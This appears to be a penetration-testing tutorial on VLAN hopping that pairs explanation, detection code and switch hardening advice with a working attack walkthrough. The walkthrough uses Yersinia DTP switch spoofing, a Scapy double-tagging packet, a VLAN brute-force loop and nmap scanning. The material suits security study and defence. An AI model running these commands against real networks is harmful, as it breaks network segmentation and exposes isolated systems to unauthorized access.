VLAN Hopping

Understanding VLAN Hopping - Bypassing Network Segmentation

What is VLAN Hopping?

Simple Definition: VLAN hopping is a network attack that allows an attacker to send traffic from one VLAN to another without going through a router, bypassing the network segmentation that VLANs are designed to provide.

Technical Definition: VLAN hopping exploits misconfigurations in VLAN trunking protocols or native VLAN settings to traverse VLAN boundaries, enabling unauthorized access to isolated network segments through switch spoofing or double-tagging techniques.

Why VLAN Hopping Works

VLAN hopping succeeds due to specific switch configuration weaknesses:

  • Auto-Trunking Protocols: Dynamic Trunking Protocol (DTP) automatically negotiates trunk links without authentication
  • Native VLAN Misuse: Default native VLAN (usually VLAN 1) processes untagged frames
  • Double-Tagging Vulnerability: A switch that receives a frame whose outer tag matches its native VLAN strips only that tag and forwards the still-tagged frame onward
  • Default Configurations: Many switches ship with insecure default settings enabling these attacks

Attack Process Breakdown

Switch Spoofing Method

  1. DTP Negotiation: Attacker sends DTP frames claiming to be a switch
  2. Trunk Establishment: Target switch agrees to form trunk link
  3. Multi-VLAN Access: Attacker gains access to all VLANs on trunk
  4. Traffic Interception: Can send and receive traffic on any accessible VLAN

Double-Tagging Method

  1. Craft Double-Tagged Frame: Create frame with two 802.1Q VLAN tags
  2. Outer Tag Stripped: First switch removes outer tag (native VLAN)
  3. Inner Tag Processed: Second switch forwards based on inner tag
  4. VLAN Boundary Crossed: Frame reaches target VLAN without routing

Real-World Impact

Network Segmentation Bypass: Access sensitive VLANs (management, finance, servers) from guest networks

Lateral Movement: Move between network segments during penetration testing or attacks

Data Exfiltration: Access isolated databases or file servers on protected VLANs

Compliance Violations: Breach of network segmentation required by PCI-DSS, HIPAA

Service Disruption: Send malicious traffic to critical infrastructure VLANs

Technical Concepts

VLAN Fundamentals

802.1Q Tagging: IEEE standard that inserts a 4-byte tag into Ethernet frames; the tag's 12-bit VLAN ID field gives 4096 possible values

Trunk vs Access Ports:

  • Access ports: Belong to single VLAN, tags removed before sending to host
  • Trunk ports: Carry multiple VLANs, maintain tags between switches

Native VLAN: Carries untagged traffic on trunk links, typically VLAN 1 by default

Dynamic Trunking Protocol (DTP)

Negotiation Modes:

  • Dynamic Auto: Becomes trunk if other side initiates
  • Dynamic Desirable: Actively attempts to become trunk
  • Trunk: Always trunking
  • Access: Never trunking

Security Risk: DTP operates without authentication, trusting any device claiming to be a switch

Double-Tagging Mechanics

Frame Structure: [Ethernet Header][Outer 802.1Q][Inner 802.1Q][Data]

Processing Flow: First switch strips the outer tag because it matches the trunk's native VLAN → Frame crosses the trunk carrying only the inner tag → Next switch forwards it into the VLAN named by the inner tag, with no router involved

Technical Implementation

Prerequisites

Network Requirements:

  • Access to network with VLANs configured
  • Switch port that negotiates DTP, or an access port placed in the trunk's native VLAN
  • Knowledge of VLAN IDs in use

Essential Tools:

  • Yersinia: Comprehensive Layer 2 attack framework
  • Scapy: Packet crafting for double-tagging
  • Vconfig: VLAN interface configuration
  • Tcpdump: Traffic verification

Essential Command Sequence

Step 1: VLAN Reconnaissance

# Passive VLAN discovery through CDP/LLDP
tcpdump -nn -v -i eth0 -s 1500 -c 1 'ether[20:2] == 0x2000'
# Captures Cisco Discovery Protocol frames
# May reveal VLAN information and trunk status

# Monitor for VLAN tagged traffic
tcpdump -ni eth0 -e vlan
# -e: Show link-level header with VLAN tags
# Identifies active VLANs from observed traffic

# Check if port accepts tagged frames
vconfig add eth0 100
# Creates a VLAN 100 sub-interface; this always succeeds locally,
# so the ping below is the real test of whether tagged frames get through
ifconfig eth0.100 192.168.100.50/24 up
ping -c 1 -I eth0.100 192.168.100.1

Purpose: Identify VLAN configuration and determine if port allows VLAN manipulation before launching attacks.

Step 2: Test for DTP Vulnerability

# Listen for DTP frames
tcpdump -nn -v -i eth0 'ether[20:2] == 0x2004'
# DTP frames indicate dynamic trunking enabled
# If seen, port vulnerable to switch spoofing

# Check current port mode
# If you see DTP frames being sent by switch:
# - Port is in dynamic mode
# - Vulnerable to trunk negotiation

Purpose: Determine if target switch has DTP enabled and will negotiate trunk connections.

Step 3: Execute Switch Spoofing Attack

Using Yersinia:

# Launch Yersinia interactive mode
yersinia -I
# Select: DTP protocol
# Choose: "enabling trunking" attack
# Sends DTP desirable frames to negotiate trunk

# Command-line DTP attack
yersinia dtp -attack 1
# Attack 1: Send DTP desirable packets
# Attempts to establish trunk with switch
# Monitor with tcpdump for success

Manual Trunk Configuration (if DTP succeeds):

# After trunk established, configure VLAN interfaces
for vlan in 10 20 30 100 200; do
    vconfig add eth0 $vlan
    ifconfig eth0.$vlan up
done
# Creates interfaces for multiple VLANs
# Each interface can access respective VLAN

# Assign IP addresses for each VLAN
ifconfig eth0.10 192.168.10.50/24
ifconfig eth0.20 192.168.20.50/24
# Now can communicate with devices in these VLANs

Step 4: Execute Double-Tagging Attack

Using Scapy for Double-Tagging:

#!/usr/bin/env python3
from scapy.all import *

# Craft double-tagged packet
# Outer tag: Native VLAN (usually 1)
# Inner tag: Target VLAN (e.g., 100)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="192.168.100.5")/ICMP()

# Send the double-tagged frame
sendp(packet, iface="eth0")

Manual Double-Tagging with Packet Crafting:

# Using Yersinia for double-tagging
yersinia dot1q -attack 1 -source 00:11:22:33:44:55 \
    -dest ff:ff:ff:ff:ff:ff -vlan1 1 -vlan2 100
# -vlan1: Outer tag (native VLAN)
# -vlan2: Inner tag (target VLAN)
# Packet reaches VLAN 100 without routing

Step 5: Verify VLAN Access

# Test connectivity to different VLANs
for vlan in 10 20 30; do
    echo "Testing VLAN $vlan..."
    ping -c 2 -I eth0.$vlan 192.168.$vlan.1
    arping -c 2 -I eth0.$vlan 192.168.$vlan.1   # -c: stop after 2 requests instead of running forever
done
# Successful pings confirm VLAN access

# Scan discovered VLANs for hosts
nmap -sn 192.168.10.0/24 -e eth0.10   # -e selects the interface (nmap has no --interface option)
# Discovers hosts on accessed VLAN
# Reveals previously isolated systems

# Monitor traffic on specific VLAN
tcpdump -ni eth0.100
# Captures traffic from target VLAN
# Confirms successful VLAN hopping

Purpose: Confirm successful VLAN boundary traversal and enumerate accessible resources.

Attack Variations

Native VLAN Modification

# Change native VLAN on trunk (if accessible)
# This varies by switch vendor
# Generally requires switch access

# Monitor native VLAN traffic
tcpdump -ni eth0 not vlan
# Untagged traffic belongs to native VLAN
# Useful for identifying native VLAN number

VLAN Range Scanning

# Systematically test VLAN accessibility
# Valid 802.1Q IDs are 1-4094 (0 and 4095 are reserved)
for vlan in {1..4094}; do
    vconfig add eth0 $vlan 2>/dev/null
    ifconfig eth0.$vlan up 2>/dev/null   # sub-interface must be up before arping can use it
    timeout 1 arping -c 1 -I eth0.$vlan 192.168.1.1 2>/dev/null && \
        echo "VLAN $vlan is accessible"
    vconfig rem eth0.$vlan 2>/dev/null
done
# Discovers all accessible VLANs
# Time-consuming but thorough

Private VLAN Attacks

# Test for private VLAN vulnerabilities
# Attempt communication between isolated ports
# If successful, private VLANs misconfigured

# Create interfaces for primary/secondary VLANs
vconfig add eth0 100  # Primary VLAN
vconfig add eth0 101  # Isolated VLAN
vconfig add eth0 102  # Community VLAN

Common Issues and Solutions

Problem: DTP frames sent but no trunk established

  • Solution: Try different source MAC addresses; some switches apply MAC-based restrictions on the port

Problem: Double-tagging packets not reaching target

  • Solution: Verify the native VLAN configuration and make sure the outer tag matches the native VLAN of the trunk the frame must cross

Problem: VLAN interfaces created but no connectivity

  • Solution: Check whether port security limits the number of MAC addresses on the port, and verify the VLAN is actually in use

Problem: Limited to one-way communication with double-tagging

  • Solution: Double-tagging is one-way by design: the frame reaches the target VLAN, but replies are not double-tagged and never return to the attacker's port; combine it with other techniques

Detection and Prevention

Detection Indicators

  • Unexpected DTP frames from non-switch devices
  • Multiple VLAN tags in single frame
  • Traffic from unauthorized VLANs
  • New trunk ports appearing without administrator action
  • ARP requests from multiple VLANs on access ports
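The following parser is an added example, not code from the original page: it implements the frame structure described under Double-Tagging Mechanics and the first two detection indicators above, walking the 802.1Q tag stack and checking for the Cisco SNAP protocol ID 0x2004 that the tcpdump filter in Step 2 matches. The sample frames and the source MAC are constructed for the demonstration.

```python
import struct

ETH_P_8021Q, ETH_P_8021AD = 0x8100, 0x88A8      # C-tag and QinQ S-tag ethertypes
LLC_SNAP_CISCO = b"\xaa\xaa\x03\x00\x00\x0c"    # LLC header + Cisco OUI
DTP_PID = b"\x20\x04"                            # SNAP protocol id, same value as ether[20:2] == 0x2004

def parse_frame(raw: bytes) -> dict:
    """Return dst/src MAC, the VLAN IDs of every stacked tag (outer first),
    the final ethertype/length field and the offset of the payload."""
    vlans, off, ethertype = [], 12, 0
    while len(raw) >= off + 4:
        ethertype = struct.unpack("!H", raw[off:off + 2])[0]
        if ethertype not in (ETH_P_8021Q, ETH_P_8021AD):
            break
        tci = struct.unpack("!H", raw[off + 2:off + 4])[0]
        vlans.append(tci & 0x0FFF)               # low 12 bits of the TCI hold the VLAN ID
        off += 4
    return {"dst": raw[:6].hex(":"), "src": raw[6:12].hex(":"),
            "vlans": vlans, "ethertype": ethertype, "payload_off": off + 2}

def alerts_for(raw: bytes, native_vlan: int = 1) -> list:
    """Flag the two Layer 2 indicators a port monitor should raise on an access port."""
    f, alerts = parse_frame(raw), []
    if len(f["vlans"]) >= 2:
        alerts.append("double-tagged frame, VLAN stack %s" % f["vlans"])
        if f["vlans"][0] == native_vlan:
            alerts.append("outer tag is native VLAN %d: double-tagging pattern" % native_vlan)
    p = f["payload_off"]
    if f["ethertype"] < 0x0600 and raw[p:p + 8] == LLC_SNAP_CISCO + DTP_PID:
        alerts.append("DTP frame from %s: trunk negotiation on this port" % f["src"])
    return alerts

# Constructed sample frames (not captured traffic); the source MAC is a placeholder.
SRC = bytes.fromhex("001122334455")
SINGLE_TAGGED = bytes(6 * [0xff]) + SRC + bytes.fromhex("8100000a0800") + bytes(20)
DOUBLE_TAGGED = bytes(6 * [0xff]) + SRC + bytes.fromhex("8100000181000064" "0800") + bytes(20)
DTP_FRAME = bytes.fromhex("01000ccccccc") + SRC + b"\x00\x30" + LLC_SNAP_CISCO + DTP_PID + b"\x01" + bytes(20)

if __name__ == "__main__":
    for name, frame in [("single", SINGLE_TAGGED), ("double", DOUBLE_TAGGED), ("dtp", DTP_FRAME)]:
        print(name, parse_frame(frame)["vlans"], alerts_for(frame))
```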

Prevention Measures

Disable DTP:

switchport mode access
switchport nonegotiate
! mode must be set to access (or trunk) first; IOS rejects nonegotiate on a port still in a dynamic mode

Explicit Trunk Configuration:

  • Manually configure trunk ports
  • Never use dynamic modes
  • Disable unused ports

Native VLAN Security:

  • Change native VLAN from default (VLAN 1)
  • Use dedicated VLAN for native traffic
  • Tag native VLAN on trunks

VLAN Access Control Lists (VACLs):

  • Filter traffic between VLANs
  • Implement at switch level
  • More granular than router ACLs

Private VLANs:

  • Isolate hosts within same VLAN
  • Limit lateral movement
  • Protect sensitive systems
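An added configuration audit (example code, not from the page or from any vendor tool) that checks an IOS-style running-config against the prevention measures above: dynamic modes, missing nonegotiate, default native VLAN and unrestricted trunks. The sample config is constructed and places each weak port beside its hardened counterpart.

```python
# Constructed IOS-style running-config sample (not from a real device): weak ports Gi1/0/1 and Gi1/0/23 beside hardened Gi1/0/2 and Gi1/0/24.
SAMPLE_CONFIG = """\
interface GigabitEthernet1/0/1
 switchport mode dynamic desirable
interface GigabitEthernet1/0/2
 switchport mode access
 switchport access vlan 10
 switchport nonegotiate
interface GigabitEthernet1/0/23
 switchport mode trunk
 switchport trunk native vlan 1
interface GigabitEthernet1/0/24
 switchport mode trunk
 switchport trunk native vlan 999
 switchport trunk allowed vlan 10,20,30
 switchport nonegotiate
"""

def split_interfaces(config: str) -> dict:
    """Map each interface name to its indented configuration lines."""
    blocks, current = {}, None
    for line in config.splitlines():
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            blocks[current] = []
        elif current and line.startswith(" "):
            blocks[current].append(line.strip())
        else:
            current = None          # '!' or a global command ends the interface block
    return blocks

def audit_port(lines: list) -> list:
    """Findings for one port, following the prevention measures above."""
    findings = []
    mode = next((l[len("switchport mode "):] for l in lines if l.startswith("switchport mode ")), None)
    if mode is None or mode.startswith("dynamic"):
        findings.append("DTP can negotiate a trunk (mode: %s); set 'switchport mode access' or 'trunk'" % (mode or "not set, so the switch default applies"))
    if "switchport nonegotiate" not in lines:
        findings.append("missing 'switchport nonegotiate': port still sends DTP frames")
    if mode == "trunk":
        native = next((l.rsplit(" ", 1)[1] for l in lines if l.startswith("switchport trunk native vlan ")), "1")
        if native == "1":
            findings.append("native VLAN is the default (1); move it to a dedicated unused VLAN")
        if not any(l.startswith("switchport trunk allowed vlan ") for l in lines):
            findings.append("trunk carries every VLAN; restrict it with 'switchport trunk allowed vlan'")
    return findings

def audit_config(config: str) -> dict:
    return {name: audit_port(lines) for name, lines in split_interfaces(config).items()}
```

Run `audit_config(SAMPLE_CONFIG)` to get a per-interface list of findings; an empty list means the port passes every check.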

Professional Context

Legitimate Use Cases

  • Security Assessments: Testing VLAN segmentation effectiveness
  • Network Auditing: Identifying misconfigured trunk ports
  • Compliance Testing: Verifying network isolation requirements
  • Architecture Validation: Confirming VLAN design implementation

Legal and Ethical Requirements

Authorization: VLAN hopping may access sensitive network segments - explicit permission essential

Scope Definition: Clearly identify which VLANs are in-scope for testing

Data Protection: Accessing unintended VLANs may expose sensitive data requiring careful handling

Impact Assessment: Document potential for disruption to critical services on accessed VLANs


VLAN hopping attacks demonstrate that network segmentation alone is insufficient without proper switch security configuration, emphasizing the need for defense-in-depth strategies in network design.